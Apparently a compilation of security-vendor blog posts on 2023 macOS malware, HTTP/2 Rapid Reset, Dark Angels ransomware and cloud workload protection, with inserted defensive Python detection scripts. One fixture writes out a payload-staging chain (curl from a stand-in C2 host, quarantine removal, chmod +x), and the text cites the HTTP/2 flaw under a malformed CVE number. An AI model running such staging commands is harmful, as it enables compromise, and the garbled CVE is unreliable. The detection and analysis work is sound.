Offensive security practitioners would argue that the open source nature of the tool makes it possible for security vendors to develop detections for it. This is indeed true, and most third-party security software should be able to detect Poseidon either statically or behaviorally. However, Apple does not appear to have taken up that offer as yet; its malware blocking service XProtect does not contain a signature to detect Poseidon payloads.

An obfuscated Poseidon payload – red team or malware?

For defenders, additional security is required. Because of the nature of such tools, it can be difficult to tell when these payloads are spotted in the wild whether they are simply leaked red-teaming tools or genuine malware campaigns, but in either case detection and protection is required.

Living Off the Orchard | Built-in Tools Used for Malicious Acts

LOLBins or ‘Living-Off-the-Land’ techniques have a long history of use in malware and cyber attacks targeting other platforms. On macOS, there is an increasing recognition of such techniques, sometimes described as “living off the orchard”. Resources to help recognize these are becoming increasingly important.

In 2023, perhaps the most commonly used built-in tools are the system_profiler tool for gathering data about the local installation, sw_vers to collect the OS system version and build, and curl both for downloading and exfiltrating data. SentinelLabs has previously documented 20 of the most common macOS LOLBins.

One of the most common malware families seen throughout 2023 and over the last two years or so, Adload uses a combination of LOLBins like chmod, xattr, and ioreg to complete its tasks.

Adload’s use of the LOLBin ioreg

Such tools present difficulties for defenders as it makes malicious behavior more difficult to separate from legitimate behavior, precisely the reason why attackers favor using them to achieve their objectives where possible. Of course, context here is everything. Visibility into execution chains and process trees can help threat hunters understand whether such tools are being abused, while advanced EDR tools can automate detection of malicious processes that include use of LOLBins.
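As an added illustration of the process-tree reasoning described here (example code, not SentinelOne's), the script below runs two hunting rules over constructed macOS process-execution events: a curl-then-xattr-then-chmod chain on one downloaded file inside a single process tree, and system_profiler, sw_vers or ioreg launched by a binary running from a mounted disk image or temp directory. The event field names and all sample values are assumptions.

```python
"""Hunting for macOS LOLBin abuse in process-execution telemetry.

Added example, not SentinelOne code. The events below are constructed in a
simplified shape (pid, ppid, exe, argv, ts) that roughly mirrors what an EDR
or an Endpoint Security client records for process executions; field names
and the sample values are assumptions, not a real capture.
"""
from collections import defaultdict

# Built-in tools the article names as favoured by 2023 macOS malware.
RECON_BINS = {"/usr/sbin/system_profiler", "/usr/bin/sw_vers", "/usr/sbin/ioreg"}
# Parent locations that rarely spawn system recon legitimately: mounted disk
# images, temp directories and per-user cache folders.
UNTRUSTED_PARENT_PREFIXES = ("/Volumes/", "/tmp/", "/private/tmp/", "/private/var/folders/")


def index_by_pid(events):
    return {e["pid"]: e for e in events}


def root_pid(pid, by_pid):
    """Walk ppid links up to the top-most process we have an event for."""
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        parent = by_pid[pid]["ppid"]
        if parent not in by_pid:
            return pid
        pid = parent
    return pid


def curl_output_path(argv):
    """Local file curl writes with -o/--output, or None when not given."""
    for i, arg in enumerate(argv):
        if arg in ("-o", "--output") and i + 1 < len(argv):
            return argv[i + 1]
    return None


def classify_step(exe, argv):
    """Map one execution onto a step of the download-and-launch chain."""
    if exe == "/usr/bin/curl":
        return "download", curl_output_path(argv)
    if exe == "/usr/bin/xattr" and ("-d" in argv or "-c" in argv):
        return "dequarantine", argv[-1]  # e.g. xattr -d com.apple.quarantine <path>
    if exe == "/bin/chmod" and any(a.endswith("x") or a in ("755", "777") for a in argv[1:-1]):
        return "execbit", argv[-1]
    return None, None


def find_stage_chains(events):
    """Rule 1: curl -> xattr -> chmod on the same path within one process tree.

    Each step is routine on its own; the ordered trio on a freshly downloaded
    file is the pattern the article describes for staging a second payload.
    """
    by_pid = index_by_pid(events)
    steps = defaultdict(list)  # (root pid, path) -> steps seen, in time order
    findings = []
    for e in sorted(events, key=lambda x: x["ts"]):
        step, path = classify_step(e["exe"], e["argv"])
        if not step or not path:
            continue
        key = (root_pid(e["pid"], by_pid), path)
        steps[key].append(step)
        if step == "execbit" and {"download", "dequarantine"} <= set(steps[key]):
            findings.append({"rule": "curl-xattr-chmod-chain", "root_pid": key[0], "path": path})
    return findings


def find_untrusted_recon(events):
    """Rule 2: system_profiler/sw_vers/ioreg spawned by a binary running from a
    DMG mount or a temp directory, the context in which the droppers above run them."""
    by_pid = index_by_pid(events)
    findings = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if e["exe"] in RECON_BINS and parent and parent["exe"].startswith(UNTRUSTED_PARENT_PREFIXES):
            findings.append({"rule": "recon-from-untrusted-parent", "pid": e["pid"],
                             "tool": e["exe"], "parent_exe": parent["exe"]})
    return findings


def detect(events):
    return find_stage_chains(events) + find_untrusted_recon(events)


# Constructed telemetry: a decoy app on a mounted DMG stages a payload and
# profiles the host (pids 200-205); an admin in Terminal checks the OS version
# and downloads a file without touching quarantine (pids 300-303).
SAMPLE_EVENTS = [
    {"pid": 200, "ppid": 1, "ts": 0, "exe": "/Volumes/Brief_Presentation/Brief.app/Contents/MacOS/Brief", "argv": ["Brief"]},
    {"pid": 201, "ppid": 200, "ts": 1, "exe": "/usr/bin/curl", "argv": ["curl", "-sL", "http://c2.invalid/stage2", "-o", "/tmp/.stage2"]},
    {"pid": 202, "ppid": 200, "ts": 2, "exe": "/usr/bin/xattr", "argv": ["xattr", "-d", "com.apple.quarantine", "/tmp/.stage2"]},
    {"pid": 203, "ppid": 200, "ts": 3, "exe": "/bin/chmod", "argv": ["chmod", "+x", "/tmp/.stage2"]},
    {"pid": 204, "ppid": 200, "ts": 4, "exe": "/usr/bin/sw_vers", "argv": ["sw_vers"]},
    {"pid": 205, "ppid": 200, "ts": 5, "exe": "/usr/sbin/system_profiler", "argv": ["system_profiler", "SPHardwareDataType"]},
    {"pid": 300, "ppid": 1, "ts": 0, "exe": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", "argv": ["Terminal"]},
    {"pid": 301, "ppid": 300, "ts": 1, "exe": "/bin/zsh", "argv": ["-zsh"]},
    {"pid": 302, "ppid": 301, "ts": 2, "exe": "/usr/bin/sw_vers", "argv": ["sw_vers"]},
    {"pid": 303, "ppid": 301, "ts": 3, "exe": "/usr/bin/curl", "argv": ["curl", "-O", "https://example.invalid/tool.tgz"]},
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The benign Terminal session produces no findings because its sw_vers has a shell parent and its download never has quarantine stripped; only the DMG-hosted tree trips both rules.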

Abusing Open Source Software for Initial Compromise

In July 2023, malware dubbed JokerSpy was reported by several vendors, though attribution remains uncertain. JokerSpy contained several components, including two Python backdoors, the red-teaming tool SwiftBelt, and a Swift-based Mach-O that attempts to masquerade as Apple’s own XProtect malware checking service.

Analysis of these components suggests that some attacks began the infection through a trojanized QR code generator, QRLog. The malware is hidden inside a genuine QR code generator written in Java via a malicious file, QRCodeWriter.java, inserted into the legitimate project. This file first determined the host OS, then downloaded an appropriate payload that opened a reverse shell allowing the attacker access to the victim’s device.

QRLog malware trojanizes a legitimate QR code generator

Although it is unclear how the threat actors delivered the trojanized software to targets, JokerSpy was found in several enterprise intrusions, including a large cryptocurrency exchange.

Ensuring that Open Source software is scrutinized against a known bill of materials and that any known vulnerabilities are patched is now part of CISA’s recommendations for all federal agencies, and private organizations are following suit. OSS presents a huge attack surface on all platforms, including macOS, and threat actors will continue to find ways to abuse it to compromise valuable targets.

Protecting Payloads with Multi-Stage, Modular Malware

One of this year’s most complex supply chain attacks, the Smooth Operator campaign, which compromised downstream businesses via maliciously tampering with 3CX’s call routing software client, 3CXDesktopApp, still remains something of a mystery.

In March 2023, various initial and intermediate stages of the malware were discovered for the macOS side of the infection chain. The attackers were careful to drop multiple stages that gathered information about the victim’s environment, but the final stage – we might suspect a backdoor or reverse shell – has yet to come to light.

The known stages of the malware were built for stealth. They relied on users launching the trojanized application for persistence, only collected limited data about the host’s 3CX account, and then self-deleted after sending this information to the attacker. The known payloads do not contain any backdoor capabilities and only collect data that would not seem obviously anomalous for the 3CX application.

Clearly, the attackers went to great lengths to ensure that the resources they put into the final stage malware would not be easily burned. For defenders, this is worrying because one reason for such caution would be protecting a high-value zero-day from being exposed.

In a similar vein, the JumpCloud intrusion in July 2023 also used multiple stages for stealth and to protect late stage payloads. Researchers have attributed both campaigns to DPRK-linked threat actors with a focus on supply chain attacks that will haul in sensitive enterprise information to be used in further, more targeted intrusions. At the same time, it is believed the actors behind these campaigns are developing and sharing a variety of toolsets and that further macOS malware campaigns are inevitable.

SentinelOne Customers Protected

SentinelOne customers are protected from the malware discussed in this article. In addition, the Singularity platform provides unparalleled visibility and threat hunting capabilities to enable security teams to fully investigate and remediate threats on macOS devices.

Conclusion

While Apple continues to work on improving its own attempts to detect malware targeting the macOS platform, updates to XProtect’s YARA rules still lag significantly behind detections provided by third-party solutions. For example, the Atomic Stealer rules added this week to XProtect v2173 relate to malware that has been detected in the wild by vendors for several months.

Therefore, it is highly recommended that enterprises supplement the protections offered by Apple with a security solution that uses multiple detection engines to stop both commodity malware and advanced threats.

If you would like to learn more about how SentinelOne can help protect your Mac fleet, contact us for more information or request a free demo.

The Good, the Bad and the Ugly in Cybersecurity – Week 41

The Good | New Resources to Help Fight Ransomware

Extortion and ransomware continue to be the top cyber security concern for many enterprises, not least as we see threat actors pushing into new areas such as targeting ESXi servers and exploiting known vulnerabilities to gain initial access. Good news then that CISA has launched two new resources this week for combating ransomware campaigns.

As part of its wider Ransomware Vulnerability Warning Pilot (RVWP) scheme, the agency has added a “Known to be used in ransomware campaigns” column to its existing Known Exploited Vulnerabilities (KEV) catalog. For example, the recent WS_FTP vulnerability (aka CVE-2023-40044) is now marked in the catalog as ‘Known’ under the new column after reports that threat actors are using multiple attack chains to compromise organizations.

In addition, CISA is maintaining a list of “Misconfigurations and Weaknesses Known to Be Used in Ransomware” on its StopRansomware site. This list provides information on weaknesses and misconfigurations that are commonly exploited by threat actors in ransomware campaigns and, unlike the previously mentioned KEV catalog, contains information not based on CVEs. For each entry, a short description is provided along with the name of the vulnerable service and commonly used ports.

CISA says it hopes the new resources will help guide organizations to quickly identify and mitigate vulnerable software and services that are being actively exploited. Organizations are urged to review the resources regularly as part of their proactive security measures.

The Bad | HTTP/2 Rapid Reset Attack Could Overwhelm Unpatched Servers

While denial of service attacks may be further down the list of immediate threats for some organizations, there’s no doubt that DDoS campaigns can cause serious disruption and revenue loss for targeted organizations. Amazon, Cloudflare and Google have all reported this week that a massive campaign of DDoS attacks has been exploiting a vulnerability in the HTTP/2 protocol stack.

Google says the attacks, which began in August and are ongoing today, included one attempt to overwhelm internet services that was 7.5 times larger than the previously recorded largest attack, reaching a peak of 398 million requests per second and continuing for two minutes. The service provider says that over those two minutes, the attack generated more requests than the total number of article views on Wikipedia for an entire month.

Source: Google

Analysis of the attacks showed that threat actors are using a Rapid Reset technique that leverages the stream multiplexing capabilities of the HTTP/2 protocol. These capabilities enable clients to have multiple in-flight requests open on a single TCP connection. While the number of concurrent requests per connection is nominally limited to 100, by immediately canceling each request and then generating further requests, a malicious client can in effect have an indefinite number of requests in flight. Analysts say that even a modest-sized botnet can leverage this technique to overwhelm targets’ defenses.

Enterprises or individuals serving HTTP workloads to the public internet may be at risk from the attack, and organizations are urged to verify that any vulnerable servers supporting HTTP/2 are patched against CVE-2023-444887. Multiple vendors have released patches for their products this week.
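The accounting behind the technique described above, as an added model rather than any vendor's code: the class below keeps the per-connection state an HTTP/2 server holds, applies the 100-stream concurrency ceiling, and adds a constructed RST_STREAM rate cap of the kind shipped as a mitigation. The frame traces, threshold values and time window are assumptions.

```python
"""Per-connection HTTP/2 stream accounting with a reset-rate guard.

Added example, not code from Google, Cloudflare or Amazon. It models only the
bookkeeping a server keeps for one TCP connection: the set of open streams,
the SETTINGS_MAX_CONCURRENT_STREAMS ceiling (100 here, the figure the text
cites) and a constructed cap on RST_STREAM frames per time window, the kind
of mitigation vendors shipped. Frames are (type, stream_id, seconds) tuples;
thresholds and traces are assumptions, not measured values.
"""
from collections import deque


class Http2ConnectionGuard:
    def __init__(self, max_concurrent=100, reset_limit=50, window_seconds=1.0):
        self.max_concurrent = max_concurrent
        self.reset_limit = reset_limit
        self.window = window_seconds
        self.open_streams = set()
        self.reset_times = deque()   # timestamps of recent RST_STREAM frames
        self.headers_seen = 0        # requests the server had to start working on
        self.closed_reason = None

    def on_frame(self, frame_type, stream_id, ts):
        """Apply one client frame. Returns 'ok', 'refused' or 'closed'."""
        if self.closed_reason:
            return "closed"
        if frame_type == "HEADERS":
            # The only brake the protocol limit provides: refuse a new stream
            # while max_concurrent streams are still open.
            if len(self.open_streams) >= self.max_concurrent:
                return "refused"
            self.open_streams.add(stream_id)
            self.headers_seen += 1
            return "ok"
        if frame_type == "RST_STREAM":
            # Cancelling frees the slot immediately, so a client that resets
            # each stream right after opening it never trips the limit above.
            self.open_streams.discard(stream_id)
            self.reset_times.append(ts)
            while self.reset_times and ts - self.reset_times[0] > self.window:
                self.reset_times.popleft()
            if len(self.reset_times) > self.reset_limit:
                self.closed_reason = "RST_STREAM rate exceeded"
                return "closed"
            return "ok"
        raise ValueError(f"unsupported frame type {frame_type!r}")


def replay(frames, **guard_kwargs):
    """Feed a frame trace through a fresh guard; return (guard, per-frame results)."""
    guard = Http2ConnectionGuard(**guard_kwargs)
    return guard, [guard.on_frame(*frame) for frame in frames]


def open_then_cancel_trace(n, interval=0.001):
    """Constructed trace of the Rapid Reset pattern: each request is cancelled
    as soon as it is sent, so at most one stream is ever open."""
    frames = []
    for i in range(n):
        sid = 2 * i + 1  # client-initiated streams use odd identifiers
        frames.append(("HEADERS", sid, i * interval))
        frames.append(("RST_STREAM", sid, i * interval))
    return frames


def open_only_trace(n, interval=0.001):
    """Constructed trace of a client that opens n streams and cancels none."""
    return [("HEADERS", 2 * i + 1, i * interval) for i in range(n)]


if __name__ == "__main__":
    for label, frames, kw in [
        ("150 open, no cancels", open_only_trace(150), {}),
        ("150 open+cancel, concurrency limit only", open_then_cancel_trace(150), {"reset_limit": 10**9}),
        ("150 open+cancel, with reset guard", open_then_cancel_trace(150), {}),
    ]:
        guard, results = replay(frames, **kw)
        print(f"{label}: started={guard.headers_seen} refused={results.count('refused')} "
              f"closed={guard.closed_reason}")
```

With only the concurrency ceiling, 150 open-and-cancel pairs all pass and the server starts work on every one of them; with the reset guard, the connection is closed after the 51st cancel.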

The Ugly | China Suspected in Attacks Exploiting Critical Confluence Bug

A zero-day bug in Atlassian’s Confluence software reported last week to be under active exploitation is this week said to be being used by a nation-state actor linked to China, although details remain sparse.

CVE-2023-22515 is rated 10.0, the maximum possible score, on the CVSS severity rating system. The flaw is a critical privilege escalation vulnerability in Atlassian Confluence Data Center and Server, affecting versions 8.0.0 through 8.5.1, and is exploitable anonymously if the vulnerable server is exposed to the public internet. The bug allows attackers to create a Confluence administrator account within the application.

Warnings last week of active in-the-wild exploitation were followed up this week in a series of tweets from @MSFTSecIntel, claiming that a threat actor tracked variously under the names DarkShadow and Oro0lxy was behind the activity. Several IP addresses were observed sending exploit traffic:

  • 192.69.90[.]31
  • 104.128.89[.]92
  • 23.105.208[.]154
  • 199.193.127[.]231

The threat actor has a history of exploiting unpatched web applications. In 2020, the DoJ indicted two Chinese nationals, Li Xiaoyu (李啸宇) and Dong Jiazhi (董家志), for a long-running campaign spanning 11 countries in which they stole enterprise data from multiple companies, including Covid vaccine manufacturer Moderna. Oro0lxy is known to be an online alias of Li. It is alleged that both individuals work on behalf of China’s Ministry of State Security. Both are currently wanted by the FBI.

Organizations using the affected versions of Confluence Data Center and Server are urged to update their instances as a matter of urgency and to take appropriate threat hunting measures to determine and mitigate any existing compromise.

Dark Angels | ESXi Ransomware Borrows Code & Victimology From RagnarLocker

In September 2023, automation and manufacturing company Johnson Controls was targeted in a ransomware attack where threat actors used Dark Angels ransomware to lock the company’s VMware ESXi servers. SentinelOne has analyzed the binary related to this attack and found that it has considerable overlap with RagnarLocker’s ESXi version.

In this post, we present technical details of the Dark Angels ransomware, offer a comparative analysis of Dark Angels and RagnarLocker samples, and provide recommendations for security teams safeguarding ESXi servers.

Overview

RagnarLocker is a ransomware group that was active throughout 2020 to 2022, drawing attention from the United States Federal Bureau of Investigation (FBI) for targeting entities in the critical manufacturing sector.

Dark Angels is a relative newcomer first reported in 2022 for its Windows version, which was very closely linked to the leaked Babuk Windows source code. Interestingly, our analysis finds the ESXi version of Dark Angels shares no significant overlap with the leaked Babuk ESXi locker source code, which many Linux ransomware families are based on or adapted from.

Technical Details

Dark Angels (06187023d399f3f57ca16a3a8fb9bb1bdb721603) is a 64-bit Executable & Linkable Format (ELF) binary designed for Intel-based Linux systems. On execution, the program logs the encryption progress to the hardcoded log file name, wrkman.log, which is saved to the directory that the Dark Angels binary is run from.

The program requires the operator to specify a root directory at which file encryption starts; it then processes any subdirectories beneath it. Dark Angels takes optional arguments, which are documented internally as dl:m:s:v.

The -m argument lets the operator specify how many encryption threads to run concurrently, which can be 10, 20, 25, 33, or 50. The -v argument enables verbose logging mode to the command line. The -l argument lets the actor specify a log file name for the progress log.

A Dark Angels run with the -v flag logs encryption progress to the console

During analysis, we observed that Dark Angels wrote a ransom note for each file encrypted; normally, ransomware writes one ransom note per directory where files are processed for encryption. The ransom note naming convention is .crypted.README_TO_RESTORE.

Dark Angels uses AES with a 256-bit key to encrypt files. The encryption routine can override a locked file by obtaining the PID of the locking process, then running the kill -9 command against that PID to terminate the process. This code will only execute if the PID value is greater than 10, which prevents the binary from attempting to kill files locked by crucial, kernel-interfacing processes.

Pseudocode showing Dark Angels’ logic for handling locked files

Dark Angels vs. RagnarLocker

We identified considerable similarities between the Linux version of Dark Angels and a RagnarLocker binary circa 2021, 5411d7905bef69cb16d44f52fc46aa32fd922c80. From the file metadata perspective, both binaries are roughly 150 KB in size and designed for Intel x86-64 architectures. They also share the same compiler string compilation artifact: GCC: (GNU) 4.8.5 20150623 (Red Hat 4.8.5-44).

Dark Angels and RagnarLocker use the same encryption mechanism (AES-256) and the same file extension, .crypted. This is notable because the Windows version of RagnarLocker uses a bespoke file extension, RGNR_. The Dark Angels Windows version uses the .crypt extension.

Both ransomware families share the same file path exclusion list, which ensures critical system files are not encrypted. Dark Angels’ extension exclusion list also includes the ransom note name, .README_TO_RESTORE, which is not present in RagnarLocker.

Dark Angels data segment references to excluded file extensions & paths

RagnarLocker also writes the same log file, wrkman.log. The RagnarLocker binary only takes the threading argument with the same -m flag, as outlined in its usage message.

Usage:%s [-m (10-20-25-33-50) ] Start Path

Other optional arguments seen in Dark Angels are not present in RagnarLocker.
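To make the shared artifacts from the Technical Details and comparison sections concrete, here is an added triage helper (not SentinelOne tooling) that decodes the dl:m:s:v option string and walks a directory tree for wrkman.log, .crypted files and .README_TO_RESTORE notes, reporting whether notes were dropped per file, as observed for Dark Angels, or per directory. The sample tree is constructed in a temporary directory.

```python
"""Filesystem triage for Dark Angels / RagnarLocker ESXi locker artifacts.

Added example, not SentinelOne tooling. It relies only on artifacts named in
the analysis above: the wrkman.log progress log, the .crypted extension, the
.README_TO_RESTORE note name and the getopt-style option string dl:m:s:v.
The sample tree is constructed in a temporary directory, not a real datastore.
"""
import tempfile
from pathlib import Path

LOG_NAME = "wrkman.log"
ENCRYPTED_EXT = ".crypted"
NOTE_SUFFIX = ".README_TO_RESTORE"


def parse_optstring(spec):
    """Decode a getopt(3) option string: a letter followed by ':' takes a value.

    'dl:m:s:v' therefore means -d and -v are switches while -l, -m and -s
    expect an argument, matching the text's description of -l (log file name)
    and -m (thread count).
    """
    opts, i = {}, 0
    while i < len(spec):
        takes_arg = i + 1 < len(spec) and spec[i + 1] == ":"
        opts[spec[i]] = takes_arg
        i += 2 if takes_arg else 1
    return opts


def triage_tree(root):
    """Walk a directory tree and summarise locker artifacts.

    note_style distinguishes the per-file notes observed for Dark Angels 2023
    (<file>.crypted.README_TO_RESTORE beside each encrypted file) from the
    one-note-per-directory behaviour that is usual for other lockers.
    """
    root = Path(root)
    encrypted, notes, logs = [], [], []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        if path.name == LOG_NAME:
            logs.append(path)
        elif path.name.endswith(NOTE_SUFFIX):
            notes.append(path)
        elif path.name.endswith(ENCRYPTED_EXT):
            encrypted.append(path)
    per_file_notes = [
        n for n in notes
        if n.name.endswith(ENCRYPTED_EXT + NOTE_SUFFIX)
        and (n.parent / n.name[: -len(NOTE_SUFFIX)]).exists()
    ]
    if notes and len(per_file_notes) == len(notes):
        style = "per-file"
    elif notes:
        style = "per-directory"
    else:
        style = "none"
    return {
        "encrypted": len(encrypted),
        "notes": len(notes),
        "per_file_notes": len(per_file_notes),
        "log_present": bool(logs),
        "note_style": style,
        "affected_dirs": sorted({str(p.parent.relative_to(root)) for p in encrypted}),
    }


def build_sample_tree(base):
    """Constructed layout imitating a Dark Angels run against one VM folder."""
    base = Path(base)
    vm = base / "datastore1" / "vm01"
    vm.mkdir(parents=True)
    for original in ("vm01.vmdk", "vm01.vmx"):
        (vm / (original + ENCRYPTED_EXT)).write_bytes(b"\x00" * 16)
        (vm / (original + ENCRYPTED_EXT + NOTE_SUFFIX)).write_text("constructed note\n")
    (base / LOG_NAME).write_text("constructed progress log\n")  # log lands in the binary's cwd
    (base / "bin").mkdir()
    (base / "bin" / "tool.sh").write_text("#!/bin/sh\n")  # untouched, as an excluded path would be
    return base


def run_demo():
    """Build the sample tree in a temp dir and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return triage_tree(tmp)


if __name__ == "__main__":
    print(parse_optstring("dl:m:s:v"))
    print(run_demo())
```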

The overlap between the two families is further solidified with analysis of a sample of Dark Angels ransomware observed in September 2022. Sample 7c2e9232127385989ba4d7847de2968595024e83 is highly similar to the 2023 Dark Angels sample 06187023d399f3f57ca16a3a8fb9bb1bdb721603 described above.

At the surface level, we see the same wrkman.log file being used and the same -m parameter supported, but that is the only argument available, other than supplying a starting path.

Internal references, DA Linux 2022

The .crypted extension is also used along with the previously observed README_TO_RESTORE filename.

However, the 2022 sample directs victims to a different .ONION address, qspjx67hi3heumrubqotn26cwimb6vjegiwgvrnpa6zefae2nqs6xqad[.]onion.

DA Linux 2022 Ransom Note Excerpt .ONION address

When this payload was first reported, that address was inactive, and it remains so at the time of writing. In contrast, the 2023 variant directs victims to lyoevnzm3ewiq6jeyyuob2wfou7gh47yotuucsrwlf6ju3xrw43wacad[.]onion for live-chat/support and uses p66slxmtum2ox4jpayco6ai3qfehd5urgrs4oximjzklxcol264driqd[.]onion as the victim leak site. p66slxmtum2ox4jpayco6ai3qfehd5urgrs4oximjzklxcol264driqd is the historic Dark Angels Team-hosted “Dunghill Leak” site.

Dark Angels Team Logo as seen on Dunghill Leak

Also of note, the 2023 variant changed the hosting method for proof-packs (proof or evidence of leakage), using password-protected ufile[.]io links for the victim(s).

Dark Angels Linux 2023 Proof-pack

The 2022 variant uses simple, unsecured image links to the image sharing service ibb[.]co.

Dark Angels Linux 2022 proof-pack

Recommendations

Endpoints running the SentinelOne agent are protected against the Dark Angels and RagnarLocker Linux variants. Organizations can prepare for attacks from groups like Dark Angels by implementing a robust vulnerability & patch management program, as previous reports indicate the group leverages vulnerabilities to achieve initial access before pivoting deeper into the environment.

Given the lack of security software on ESXi hypervisors, consider enhanced network monitoring for unusual access to these systems, including internal system traffic. When possible, focus on large or abnormal data transfers off of the ESXi server as well as other file storage services within the network.

Conclusion

ESXi lockers continue to prove successful for the ransomware groups who use them, yet the overall pool of unique Linux ransomware families remains narrow. We assess with high confidence that these two samples are related and that the Linux version of Dark Angels is a very lightly modified, more recent version of the analyzed RagnarLocker binary.

There is a potential caveat to attributing Dark Angels as the next iteration of RagnarLocker when vendors miscategorize information or fail to thoroughly explain connections made through their analysis. For example, the RagnarLocker binary was classified as RagnarLocker by Fortinet, but listed as a Vice Society file by another vendor, Quorum Cyber.

Based on the volume of VirusTotal community comments for the RagnarLocker binary, our assessment aligns with contributions from earlier researchers.

Indicators of Compromise

06187023d399f3f57ca16a3a8fb9bb1bdb721603 Dark Angels ELF binary (2023)
5411d7905bef69cb16d44f52fc46aa32fd922c80 RagnarLocker ELF binary (2021)
7c2e9232127385989ba4d7847de2968595024e83 Dark Angels ELF (2022)

Understanding Cloud Workload Protection (CWP) In Under 10 Minutes

In tandem with evolving business landscapes, cloud computing has emerged as a transformative force. The cloud’s ability to store, process, and deliver mass amounts of data and applications has made it the backbone of many modern businesses. Thanks to the cloud, many organizations have revolutionized the way they interact with information.

Clouds offer scalability, flexibility, and cost-efficiency, but organizations also grapple with their inherent risks and vulnerabilities. Since clouds are particularly susceptible to the threat of ransomware, data breaches, supply chain attacks, and misconfigurations, security leaders deploy cloud workload protection (CWP) strategies to secure both their data and users.

This blog post takes a closer look at what puts modern cloud environments at risk, how CWP addresses these security challenges, and the key things organizations need to know about Cloud Workload Protection Platforms (CWPPs) to maintain the integrity of their data and applications.

Securing the Whole and the Sum of All Parts | Cloud Workload Protection Defined

As more enterprises and organizations migrate over to cloud environments, protecting cloud workloads is top of mind for security leaders and IT teams.

What is a Cloud Workload?

Think of cloud workloads as the building blocks of cloud computing. They represent all of the relevant containers, functions, and machines that store the data and network resources needed to make a cloud-based application or service work properly.

Cloud workloads make up a wide range of activities such as running applications, processing data, hosting websites, and performing various computing tasks, all of which are executed within a cloud infrastructure. They can be accessed and managed remotely over the internet, making it possible for users to harness cloud resources from anywhere with an internet connection.

Cloud workloads are typically run in containers such as Docker and managed via container orchestration platforms like Kubernetes.

What distinguishes cloud workloads from traditional on-premises computing is their scalability and dynamic nature. Cloud workloads can be easily scaled up or down to meet changing demands, making them the optimal choice for organizations with fluctuating workloads. This scalability is a key advantage, allowing users to pay only for the resources they consume, rather than investing in fixed, dedicated hardware.

What is Cloud Workload Protection (CWP)?

Cloud Workload Protection, often referred to as CWP, is a holistic approach to security within cloud environments. It focuses on protecting the individual components that make up a cloud workload. This is done by ensuring the confidentiality, integrity, and availability of data and applications hosted in the cloud. Since cloud environments are highly dynamic, with workloads being spun up and down on-demand, it is too difficult to monitor and secure them using traditional security approaches.

CWP addresses these challenges with security solutions designed specifically for cloud workloads. In essence, these solutions integrate novel technologies, including artificial intelligence (AI) and machine learning (ML), for threat detection, real-time monitoring, and rapid response to security incidents. CWP providers have developed solutions that cater to the dynamic nature of cloud workloads, providing adaptive security that evolves with the environment.

The Role of a CWPP in Modern Cybersecurity

Today, CWPPs play a pivotal role in securing cloud environments by offering a range of key features and functionalities:

  • Real-Time Monitoring – CWP works by continuously monitoring cloud workloads for unusual activities, unauthorized access, and suspicious behavior. A proactive approach enables IT teams to identify potential security threats faster.
  • Threat Detection and Response – CWP leverages advanced analytics and machine learning to detect anomalies and potential security threats. When a threat is identified, it triggers automated responses or notifies the IT team for further investigation and mitigation.
  • Access Control – CWP enforces strict access controls, ensuring that only authorized users and processes can interact with cloud workloads. This includes identity and access management (IAM) controls and robust authentication mechanisms.
  • Vulnerability Management – CWP identifies and manages vulnerabilities within cloud workloads, including those associated with software, configurations, and dependencies. This approach helps organizations patch and secure their systems before potential attackers can exploit a vulnerability.

Deploying a trusted CWPP is essential for organizations operating in the cloud, as it effectively counters modern cyber threats. As cloud technologies and risks continue to develop and expand, CWPPs will remain a critical component for organizations looking to secure their digital assets and operations in the cloud era.

Understanding the Risks Found in a Cloud-First Landscape

Recent security reports have found that cloud assets remain one of the biggest targets for cyberattacks as data breaches continue to increase across all industries globally. Consider the scope of cloud-based risks by the numbers:

  • 39% of businesses dealt with data breach incidents in their cloud in 2022, up from 35% in 2021
  • 75% of organizations confirmed that more than 40% of their business-critical data is now stored in their cloud, up from the 26% reported last year
  • Though the amount of sensitive data being stored in the cloud has increased, only an average of 45% of this data is encrypted

Businesses operating in cloud environments face many cyber threats, each posing unique challenges to data security and operational integrity. Learn how Cloud Workload Protection (CWP) is instrumental in countering these threats, offering a multi-layered approach to fortifying cloud workloads and data.

Cloud Ransomware

Cloud ransomware operators focus on encrypting critical data stored in cloud environments and then demand a ransom for decryption. Ransomware operators like IceFire have expanded their focus from Windows devices to targeting Linux environments. Operators work to exploit vulnerabilities or weak access controls to gain access, encrypt data, and disrupt operations.

A CWPP counters this threat by continuously monitoring for suspicious activities, including unusual file encryption patterns. When ransomware is detected, a CWPP can respond swiftly, isolating affected workloads, limiting damage, and enabling recovery from clean backups.

Supply Chain Attacks

Supply chain attacks target third-party vendors and suppliers connected to a company’s cloud ecosystem. Cybercriminals exploit vulnerabilities in these supply chain partners to gain access to the target organization’s systems.

A Cloud Workload Protection Platform plays a vital role against such attacks by scanning and assessing the security of third-party cloud services, identifying potential vulnerabilities that could be exploited. This supports organizations in mitigating their risks and helping to bolster their security posture.

Cloud Vulnerabilities

Cloud vulnerabilities are security weaknesses in cloud platforms, services, or applications. Attackers can exploit these weaknesses to gain unauthorized access and compromise systems.

CWPP is designed to identify and address vulnerabilities in cloud environments. It conducts automated vulnerability assessments, scans for unpatched software or configurations, and offers remediation options. By applying patches and fixes, CWPP helps organizations protect their cloud workloads from exploitation.

Data Breaches

Data breaches are one of the most concerning cloud threats, involving unauthorized access to sensitive information.

A CWPP prevents data breaches by enforcing strong IAM processes, access controls, and encryption. Continuous monitoring for unauthorized access, unusual data movement, and data exfiltration helps identify potential data breach attempts early, allowing for rapid response and mitigation.

Insider Threats

Insider threats can come from employees or individuals with privileged access to cloud resources. They may intentionally or unintentionally compromise data or systems.

As the risk of insider threats grows, Cloud workload protection supports IT teams by monitoring user activities. It identifies suspicious behavior or access patterns that may indicate insider threats. Organizations can then take immediate action, such as revoking privileges or initiating investigations.

Cloud Misconfigurations

Misconfigured cloud services can expose sensitive data to the public internet, making it an attractive target for cybercriminals.

CWP helps in preventing cloud misconfigurations by offering automated security configuration checks. It identifies misconfigured services and resources, alerting organizations to rectify issues promptly. This proactive approach reduces the risk of data exposure due to misconfigurations.

DDoS Attacks

Distributed-Denial-of-Service (DDoS) attacks overwhelm cloud services with malicious traffic, causing disruptions.

